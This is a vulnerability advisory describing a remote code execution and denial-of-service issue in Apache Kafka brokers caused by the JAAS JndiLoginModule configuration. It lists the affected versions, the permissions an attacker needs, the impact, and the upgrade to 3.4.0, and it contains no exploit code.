BIT-kafka-2025-27819
RCE/Denial of service vulnerability in kafka_2.10 (Maven)

RCE/Denial of service No known exploit

What is BIT-kafka-2025-27819 About?

This vulnerability allows for Remote Code Execution (RCE) or Denial of Service (DoS) attacks via SASL JAAS JndiLoginModule configuration in Apache Kafka brokers. It is a variant of a previously known issue in Kafka Connect API, impacting the broker itself. Exploitation requires connectivity to the Kafka cluster and specific permissions.

Affected Software

  • org.apache.kafka:kafka_2.12
    • <3.4.0
  • org.apache.kafka:kafka_2.13
    • <3.4.0

Technical Details

The vulnerability stems from the improper or insecure configuration of SASL JAAS JndiLoginModule in Apache Kafka brokers. Similar to the previously identified issue in Kafka Connect API (CVE-2023-25194), if an attacker can connect to the Kafka cluster and holds the AlterConfigs permission on the cluster resource, they can manipulate the JAAS configuration to instantiate and execute code via JNDI lookups. This can lead to either arbitrary code execution (RCE) if a malicious JNDI server is controlled by the attacker, or a denial of service if the JNDI lookup results in an error or infinite loop, crashing the broker.

What is the Impact of BIT-kafka-2025-27819?

Successful exploitation may allow attackers to achieve remote code execution on the Kafka brokers, leading to full system compromise, or cause a denial of service, rendering the Kafka cluster unavailable.

What is the Exploitability of BIT-kafka-2025-27819?

Exploitation is remote, as it targets the Kafka cluster's configuration. It requires an attacker to successfully connect to the Kafka cluster and possess the AlterConfigs permission on the cluster resource. This permission requirement represents a significant prerequisite, meaning the attacker must already have some level of unauthorized access or a highly privileged compromised account. The complexity is moderate, involving crafting malicious JAAS configurations that leverage JNDI. The risk factor is high if cluster administrators or internal users with AlterConfigs permission are compromised, as the attack can lead to severe consequences like RCE. Default disabling of JndiLoginModule in newer Kafka versions mitigates this, but older or misconfigured systems remain vulnerable.

What are the Known Public Exploits?

PoC Author Link Commentary
No known exploits

What are the Available Fixes for BIT-kafka-2025-27819?

Available Upgrade Options

  • org.apache.kafka:kafka_2.13
    • <3.4.0 → Upgrade to 3.4.0
  • org.apache.kafka:kafka_2.12
    • <3.4.0 → Upgrade to 3.4.0

Struggling with dependency upgrades?

See how Resolved Security's drop-in replacements make it simple.

Book a demo

Additional Resources

What are Similar Vulnerabilities to BIT-kafka-2025-27819?

Similar Vulnerabilities: CVE-2023-25194 , CVE-2022-23305 , CVE-2021-35293 , CVE-2020-1945 , CVE-2017-1038

All Rights reserved 2025
Privacy Policy